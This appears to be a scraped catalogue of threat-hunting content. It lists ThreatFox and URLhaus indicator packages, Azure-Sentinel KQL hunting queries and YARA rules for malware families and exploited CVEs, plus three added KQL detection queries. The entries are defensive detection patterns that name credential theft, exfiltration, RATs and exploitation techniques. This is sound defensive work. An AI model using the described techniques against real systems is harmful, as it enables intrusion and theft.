Hunt package for 2 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 37 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 90 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 9 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 30 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with DarkComet

iocthreatfoxwin-darkcomet
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 4 IOCs associated with Quasar RAT

backdooriocthreatfoxwin-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 4 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 6 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox: Satacom IOCs
ioc-hunt high
ThreatFox source
DeviceFileEvents, UrlClickEvents

Hunt package for 5 IOCs associated with Satacom

iocthreatfoxwin-satacom
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 7 IOCs associated with VShell

iocthreatfoxwin-vshell
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 18 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as 54e64e

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 15 malicious URLs tagged as adb

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as amos

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 10 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as DDoSAgent

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as dropped-by-Phorpiex

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 19 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as loader

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 25 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as mirai

iocurlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 9 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
DeviceEvents

This query identifies web content filtering events in Advanced Hunting.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, WinRAR CVE-2018-20250 exploit. WinRAR is a third-party file compressing application. Versions 5.61 and earlier contained a flaw that

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, WinRAR CVE-2018-20250 exploit. WinRAR is a third-party file compressing application. Versions 5.61 and earlier contained a flaw that

exploithuntingmicrosoftofficialpersistence
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

backdoorexploithuntingmicrosoftofficial
AcroRd-Exploits
kql medium
Azure-Sentinel source
DeviceFileEvents

The following query looks for suspicious behaviors observed in the samples analyzed in the report.

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1562.001, T1055
DeviceImageLoadEvents

Identifies native processes or binaries in writable paths loading .NET runtimes. This suggests in-memory code injection and ETW patching used by malware to execute code while evading detection by secu

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query looks for anomalies in mail item access events made by Graph API. It uses standard deviation to determine if the number of events is anomalous. The query returns all clientIDs where the amo

huntingmicrosoftofficial
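As an added example that is not the catalogued query's own code, the following advanced-hunting KQL implements the approach described above: a per-application daily count of MailItemsAccessed events is compared with that application's own mean and standard deviation. The 30-day baseline, the 2-sigma threshold, the minimum of seven baseline days and the `RawEventData.ClientAppId` field name are assumptions to be checked against your tenant's data.

```kql
// Added example, not the catalogued query: per-app daily MailItemsAccessed
// counts compared against each app's own mean and standard deviation.
let lookback = 30d;                                  // assumed baseline window
let threshold = 2.0;                                 // assumed: flag > mean + 2 sigma
let daily =
    CloudAppEvents
    | where Timestamp > ago(lookback)
    | where ActionType == "MailItemsAccessed"
    // The calling application id sits in the raw audit payload (assumed field name).
    | extend ClientAppId = tostring(RawEventData.ClientAppId)
    | where isnotempty(ClientAppId)
    | summarize Events = count() by ClientAppId, Day = startofday(Timestamp);
let baseline =
    daily
    | where Day < startofday(now())                  // keep today out of its own baseline
    | summarize MeanEvents = avg(Events), StdEvents = stdev(Events), BaselineDays = dcount(Day)
              by ClientAppId;
daily
| where Day == startofday(now())
| join kind=inner baseline on ClientAppId
| where BaselineDays >= 7 and StdEvents > 0          // enough history for sigma to mean something
| extend Zscore = (Events - MeanEvents) / StdEvents
| where Zscore > threshold
| project ClientAppId, Events, MeanEvents, StdEvents, Zscore, BaselineDays
| order by Zscore desc
```

Applications with fewer than seven days of history, or a flat history (zero standard deviation), are dropped by the guard rather than flagged; a brand-new application reading mail is worth its own separate review, since this query cannot score it.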
Yara-Rules source

Anthem Hack Deep Panda - htran-exe

community
Yara-Rules source

Anthem Hack Deep Panda - lot1.tmp-pwdump

community
Yara-Rules source

Anthem Hack Deep Panda - ScanLine sl-txt-packed

community
Yara-Rules source

Anthem Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll

backdoorcommunity
APT DeputyDog
yara low
Yara-Rules source

YARA rule: APT_DeputyDog

aptcommunitydeputydog
Yara-Rules source

YARA rule: APT_DeputyDog_Fexel

aptcommunitydeputydog_fexel
Yara-Rules source

YARA rule: APT_Derusbi_DeepPanda

aptcommunityderusbi_deeppanda
APT Derusbi Gen
yara low
Yara-Rules source

YARA rule: APT_Derusbi_Gen

aptcommunityderusbi_gen
Yara-Rules source

Rule to detect Duqu 2.0 drivers

community
Yara-Rules source

The YARA rule 'apt_duqu2_loaders' detects Duqu 2.0 malware samples

community
Yara-Rules source

YARA rule: apt_nix_elf_derusbi

aptcommunity
Yara-Rules source

YARA rule: apt_nix_elf_derusbi_kernelModule

aptcommunity
Yara-Rules source

YARA rule: apt_nix_elf_Derusbi_Linux_SharedMemCreation

aptcommunity
Yara-Rules source

YARA rule: apt_nix_elf_Derusbi_Linux_Strings

aptcommunity
Yara-Rules source

YARA rule: apt_win_exe_trojan_derusbi

aptbackdoorcommunity
Yara-Rules source

YARA rule: apt_win32_dll_bergard_pgv_pvid_variant

aptcommunity
Azure-Sentinel source
CloudAppEvents

Looks for accounts that uploaded multiple code repositories to an external web domain.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Assuming the machine is properly protected with BitLocker, it will need to be running for an attacker to extract the SAM and SYSTEM files. This first query looks for any access to the HKLM that hap

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

The following query surfaces network activity associated with exploitation of CVE-2022-22965.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Checks all created files that do not have the extension ps1, bat or cmd (to exclude IT Pro scripts) and that are not copied to C:\, in order to detect file shares, external drives and data partitions that are not allowed,

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsEmailAttachmentInfoEmailEvents

This query can be used to detect instances of a malicious insider creating a file archive and then emailing that archive to an external "competitor" organization.

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceNetworkEvents

This query can be used to explore any instances where a terminated individual (i.e. one who has an impending termination date but has not left the company) downloads a large number of files from a non

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEventsDeviceNetworkEventsDeviceProcessEvents

This query can be used to detect instances of malicious users who attempt to create steganographic images and then immediately browse to a webmail URL. This query would require additional investigati

backdoorhuntingmicrosoftofficial
Yara-Rules source

Identify service hollowing and persistence setting

communitypersistence
Yara-Rules source

File manipulation actions associated with CRASHOVERRIDE wiper

community
Yara-Rules source

Registry Wiper functionality associated with CRASHOVERRIDE

community
Azure-Sentinel source
DeviceProcessEvents

The query checks process command-line arguments and parent/child combinations to find machines where there have been attempts to exploit the protocol handler vulnerability in the Electron framework, CVE-

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released patches for four different zero-day vulne

backdoorexploithuntingmicrosoftofficialpowershell
Azure-Sentinel source
DeviceEventsDeviceFileEvents

This query lists files copied to external USB drives, with USB drive information, based on FileCreated events associated with the most recent USBDriveMount events before the file creations. But be aware that Adv

huntingmicrosoftofficial
Flash-CVE-2018-4848
kql medium
Azure-Sentinel source
DeviceNetworkEvents

This query checks for specific processes and the domain TLD used in the CVE-2018-4878 Flash 0-day exploit attack reported by KrCERT. CVE: CVE-2018-4878. Read more here: https://www.krcert.or.kr/data/secNo

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1098.003T1528
AuditLogs

Identifies application role assignments to service principals granting high-risk permissions such as Mail.ReadWrite, Directory.ReadWrite.All, or RoleManagement.ReadWrite.Directory, which provide tenan

huntingmicrosoftofficial
Azure-Sentinel source
T1566
AlertEvidenceCloudAppEvents

Identifies the user who acted on a reported phishing message and compares that actor with the original recipient, helping investigate delegate or shared mailbox reporting scenarios.

huntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

The query checks process command-line arguments and parent/child combinations to find machines where there have been attempts to exploit the DHCP remote command injection vulnerability CVE-2018-1111. DynoRoot

exploithuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

The MailItemsAccessed action is part of the new Advanced Audit functionality of Microsoft Defender XDR. It's part of Exchange mailbox auditing and is enabled by default for users that have an Office 3

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Action "PnpDeviceConnected" reports the connection of any plug and play device. Read more online on event 6416: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-6416. Query

huntingmicrosoftofficial
Azure-Sentinel source
DeviceEvents

Action "PnpDeviceConnected" reports the connection of any plug and play device. Read more online on event 6416: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-6416. Query

huntingmicrosoftofficial
MosaicLoader
kql medium
Azure-Sentinel source
DeviceRegistryEvents

This hunting query looks for malware that hides itself among Windows Defender exclusions to evade detection.

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

This query helps you review all OAuth applications accessing user mail via Graph. It could return a significant number of results depending on how many applications are deployed in the environment.

huntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

As described in previous guidance, Nobelium may re-purpose legitimate existing OAuth applications in the environment to their own ends. However, malicious activity patterns may be discernible from le

apthuntingmicrosoftofficial
Azure-Sentinel source
CloudAppEvents

Use this query to review OAuth applications whose behaviour has changed as compared to a prior baseline period. The following query returns OAuth Applications accessing user mail via Graph that did no

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

One common technique leveraged by attackers is using archiving applications to package up files for exfiltration. In many cases, these archives are usually protected with a password to make analysis m

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceEventsDeviceFileEvents

This query searches for file copies which occur within a period of time (by default 15 min) to volumes other than the C drive or UNC shares. By default, this query will search all devices. A single de

huntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

The first query digs into the print spooler drivers folder for any file creations; many of the files that come up here may be legitimate. Unsigned files, or ones that don't have any relation to printers, that

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

The first query digs into the print spooler drivers folder for any file creations; many of the files that come up here may be legitimate. Unsigned files, or ones that don't have any relation to printers, that

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
T1098.003
AuditLogs

Identifies permanent directory role assignments to privileged roles made outside the Privileged Identity Management activation workflow. Direct assignments bypass PIM approval and justification requir

evasionhuntingmicrosoftofficial
Yara-Rules source

Designed to catch a loader observed in use with ROKRAT malware

backdoorcommunity
Yara-Rules source

Designed to catch a loader observed in use with ROKRAT malware

backdoorcommunity
Azure-Sentinel source
T1098.001
AuditLogs

Identifies service principal credential additions or updates by actors with no history of this operation in the preceding 90 days. A new actor outside the established baseline may indicate credential

backdoorcredential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceNetworkEvents

Checks for network connections to SolarWinds-related IPs, based on DeviceNetworkEvents.

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

Looks for spoolsv.exe launching rundll32.exe with an empty command line.

huntingmicrosoftofficial
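As an added example that is not the catalogued query itself, this advanced-hunting KQL implements the description above against the standard DeviceProcessEvents schema. The seven-day lookback and the quote/whitespace normalisation are assumptions; rundll32.exe started with no arguments is exactly what a spooler-loaded DLL looks like when the spooler has nothing legitimate to pass it.

```kql
// Added example, not the catalogued query: spoolsv.exe spawning rundll32.exe
// with no arguments (spooler-driven DLL loading, as in PrintNightmare).
DeviceProcessEvents
| where Timestamp > ago(7d)                                   // assumed lookback
| where InitiatingProcessFileName =~ "spoolsv.exe"
| where FileName =~ "rundll32.exe"
// An "empty" command line shows up either as nothing at all or as just the
// image name; strip quotes and whitespace before testing for either form.
| extend CmdLine = trim(@"[\s""]+", ProcessCommandLine)
| where isempty(CmdLine) or CmdLine =~ "rundll32.exe"
| project Timestamp, DeviceName, AccountName,
          InitiatingProcessId, InitiatingProcessCommandLine,
          ProcessId, ProcessCommandLine
| order by Timestamp desc
```

A hit is worth pivoting on the child ProcessId in DeviceImageLoadEvents: the DLL the spooler handed to rundll32.exe is the artifact you want, and its path under the spool drivers tree tells you whether this was a dropped driver or an ordinary print driver upgrade.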
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEvents

Looks for the creation of suspicious DLL files in the \spool\ folder, along with DLLs that were loaded shortly afterwards from \Old.

huntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

Monitor for creation of suspicious files in the /spools/driver/ folder. This is a broad-based search that will surface any creation or modification of files in the folder targeted by this exploit. Fal

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceImageLoadEventsDeviceProcessEvents

Surfaces suspicious spoolsv.exe behavior likely related to CVE-2021-1675

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1203
DeviceProcessEvents

The query checks for suspicious Tomcat process launches associated with likely exploitation of Confluence, CVE-2022-26134. Read more here: https://confluence.atlassian.com/doc/confluence-security-adv

exploithuntingmicrosoftofficial
ThreatFox: Antidot IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Antidot

apk-antidotiocthreatfox
ThreatFox: Kimwolf IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 13 IOCs associated with Kimwolf

apk-kimwolfiocthreatfox
ThreatFox: Mozi IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Mozi

elf-moziiocthreatfox
ThreatFox: PerlBot IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with PerlBot

elf-perlbotiocthreatfox
ThreatFox: RedTail IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 3 IOCs associated with RedTail

elf-redtailiocthreatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with XMRIG

elf-xmrigiocthreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 64 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 8 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 23 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Unknown Loader

iocthreatfoxunknown_loader
ThreatFox source
UrlClickEvents

Hunt package for 2 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 10 IOCs associated with AdaptixC2

aptiocthreatfoxwin-adaptix_c2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 16 IOCs associated with Cobalt Strike

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox source
DnsEvents

Hunt package for 8 IOCs associated with CountLoader

iocthreatfoxwin-count_loader
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: PureRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with PureRAT

backdooriocthreatfoxwin-pure_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 2 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox: Remus IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with Remus

iocthreatfoxwin-remus
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 5 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Tofsee IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 4 IOCs associated with Tofsee

iocthreatfoxwin-tofsee
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with ValleyRAT

backdooriocthreatfoxwin-valley_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 12 IOCs associated with Vidar

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with VShell

iocthreatfoxwin-vshell
Trojan Derusbi
yara low
Yara-Rules source

YARA rule: Trojan_Derusbi

backdoorcommunity
Azure-Sentinel source
CloudAppEvents

This query looks for users sharing access to files with external users. This applies to SharePoint and OneDrive users. Audit event and Cloud application identifier references. Reference - https://l

huntingmicrosoftofficial
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 134-199-190-221

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as 165-227-155-54

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 47 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 5 malicious URLs tagged as arm

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 15 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 4 malicious URLs tagged as e73f7ff7572070d56a631ac6796adabd

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as ocx

iocurlhaus
Azure-Sentinel source
T1204T1548
DeviceProcessEvents

The query checks for process commands being placed into the script; CVE-2022-22960 allows a user to write to it and have it executed as root. This vulnerability of VMware Workspace ONE Access, Identity Manager

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1574
DeviceFileEvents

The query digs into the Windows print spooler drivers folder for any file creations; many of the files that come up here may be legitimate. A suspicious DLL is loaded from the Spooler Service backup folder. This

exploithuntingmicrosoftofficial
Azure-Sentinel source
T1204.003
DeviceEventsDeviceProcessEvents

This query looks for .lnk file executions from locations other than the C: drive, which can indicate mounted ISO files. Reference - https://threathunt.blog/detecting-a-payload-delivered-with-iso-files-us

huntingmicrosoftofficial
Yara-Rules source

TheMask / Careto CnC communication signature

community
Yara-Rules source

TheMask / Careto known command and control domains

community
Yara-Rules source

TheMask / Careto OSX component signature

community
Yara-Rules source

TheMask / Careto SGH component signature

community
Yara-Rules source

Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo

community
Yara-Rules source

Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo

community
Yara-Rules source

Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo

community
Yara-Rules source

Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo

community
Azure-Sentinel source
DeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDeviceProcessEvents

This query was originally published in the threat analytics report, ShadowHammer supply chain attack. Operation ShadowHammer was an attack against ASUS computer hardware, using the company's own update

backdoorhuntingmicrosoftofficial
Yara-Rules source

Detects functions coded with ROR edi,D; detects Cobalt Strike used by different APT groups

aptcobalt-strikecommunity
Azure-Sentinel source
DeviceProcessEvents

This query generates process trees of given processes and performs anomaly detection on the process trees. It generates process trees up to the 7th level. The query can be used as a template to perform an

backdoorhuntingmicrosoftofficial
Azure-Sentinel source
DeviceFileEvents

This query was originally published in the threat analytics report, Exploitation of CVE-2019-0708 (BlueKeep). CVE-2019-0708, also known as BlueKeep, is a critical remote code execution vulnerability i

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Motivated miners. Doublepulsar is a backdoor developed by the National Security Agency (NSA). First disclosed in 2017, it is now use

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, CVE-2018-8653 scripting engine vulnerability. CVE-2018-8653 is a remote code execution vulnerability found in the scripting engine f

backdoorexploithuntingmicrosoftofficial
Azure-Sentinel source
T1053
DeviceEventsDeviceProcessEventsDeviceRegistryEvents

This query looks for signs of the impacket atexec module. Should work with others using a similar technique. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-part-3/

huntingmicrosoftofficial
Azure-Sentinel source
T1559.001
DeviceNetworkEventsDeviceProcessEvents

This query looks for signs of impacket dcomexec module. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-part-2/

huntingmicrosoftofficial
Azure-Sentinel source
T1569.002
DeviceEventsDeviceFileEventsDeviceProcessEvents

This query looks for signs of impacket psexec module usage. May hit other psexec-like techniques too. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-psexec/

huntinglateral-movementmicrosoftofficial
Azure-Sentinel source
T1047
DeviceEventsDeviceNetworkEventsDeviceProcessEvents

This query looks for signs of impacket wmiexec module usage. May hit other wmi execution-like techniques too. Author: Jouni Mikkola More info: https://threathunt.blog/impacket-part-2/

huntinglateral-movementmicrosoftofficialwmi
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, CVE-2018-15982 exploit attacks. CVE-2018-15982 is a vulnerability in Adobe Flash Player that allows remote execution of arbitrary co

backdoorexploithuntingmicrosoftofficialphishing
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Msiexec abuse. Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows inst

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Msiexec abuse. Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows inst

credential-thefthuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Msiexec abuse. Msiexec.exe is a Windows component that installs files with the .msi extension. These kinds of files are Windows inst

credential-thefthuntingmicrosoftofficialpowershell
Azure-Sentinel source
T1221
DeviceProcessEvents

This query detects possible abuse of ms-msdt MSProtocol URI scheme to load and execute malicious code via Microsoft Support Diagnostic Tool Vulnerability (CVE-2022-30190). The following query detects

exploithuntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ursnif (Gozi) continues to evolve. Windows Management Instrumentation, or WMI, is a legitimate Microsoft framework used to obtain ma

backdoorhuntingmicrosoftofficialwmi
Azure-Sentinel source
IdentityLogonEvents

This query aims to detect someone requesting service tickets (where count >= MaxCount). The query requires tuning to set a baseline level for MaxCount. MITRE technique: Kerberoasting (T1558.003) @Ma

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Ursnif (Gozi) continues to evolve. Microsoft HTML Applications, or HTAs, are executable files that use the same technologies and mod

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query identifies UAC elevated processes by analyzing launches of consent.exe (the process that performs UAC elevation). The first parameter of consent.exe is the process ID being elevated, theref

huntingmicrosoftofficial
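As an added example that is not the catalogued query's own code, this advanced-hunting KQL carries the observation above through to a result: the PID in consent.exe's first argument is parsed out and joined back to the process-creation row on the same device. The seven-day lookback, the one-hour pairing window and the command-line regex are assumptions; the time bound matters because PIDs are reused and an unconstrained join on ProcessId will pair the prompt with the wrong process.

```kql
// Added example, not the catalogued query: recover which process each
// consent.exe launch elevated. The first argument of consent.exe is the PID
// of the process requesting elevation; join that back to its creation event.
let lookback = 7d;                                            // assumed window
let consentLaunches =
    DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where FileName =~ "consent.exe"
    | extend ElevatedPid = tolong(extract(@"(?i)consent\.exe\s+(\d+)", 1, ProcessCommandLine))
    | where isnotnull(ElevatedPid)
    | project DeviceId, ConsentTime = Timestamp, ElevatedPid;
DeviceProcessEvents
| where Timestamp > ago(lookback)
| join kind=inner consentLaunches on DeviceId, $left.ProcessId == $right.ElevatedPid
// PIDs are reused: only accept a process that started before the prompt and
// within a bounded window of it (assumed 1h).
| where Timestamp <= ConsentTime and ConsentTime - Timestamp < 1h
| project ConsentTime, DeviceName, AccountName, ElevatedPid,
          FileName, FolderPath, ProcessCommandLine, ProcessIntegrityLevel
| order by ConsentTime desc
```

Elevations requested by binaries outside Program Files and Windows, or by scripting hosts and LOLBins, are the rows to triage first; a summarize by FolderPath and FileName over the result gives a quick frequency view for the fleet.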
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Motivated miners. Doublepulsar is a backdoor developed by the National Security Agency (NSA). First disclosed in 2017, it is now use

backdoorexploithuntingmicrosoftofficial
Yara-Rules source

CRASHOVERRIDE v1 Config File Parsing

community
Yara-Rules source

CRASHOVERRIDE v1 Suspicious Export

community
Yara-Rules source

CRASHOVERRIDE Malware Hashes

community
Yara-Rules source

IEC-104 Interaction Module Program Strings

community
Yara-Rules source

CRASHOVERRIDE v1 Suspicious Strings and Export

community
Yara-Rules source

CRASHOVERRIDE v1 Wiper

community
Yara-Rules source

Blank mutex creation associated with CRASHOVERRIDE

community
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, Emulation-evading JavaScripts. Attackers in several ransomware campaigns have employed heavily obfuscated JavaScript code, in order

backdoorevasionhuntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceFileEventsDeviceProcessEvents

This query was originally published in the threat analytics report, EvilQuest signals the rise of Mac ransomware. As of the time of this writing (October 2020), ransomware designed to target macOS is

huntingmicrosoftofficialransomware
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, OSX/Shlayer sustains adware push. Shlayer is adware that spies on users' search terms, and redirects network traffic to serve the us

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

This query was originally published in the threat analytics report, OSX/Shlayer sustains adware push. Shlayer is adware that spies on users' search terms, and redirects network traffic to serve the us

huntingmicrosoftofficial
Azure-Sentinel source
DeviceProcessEvents

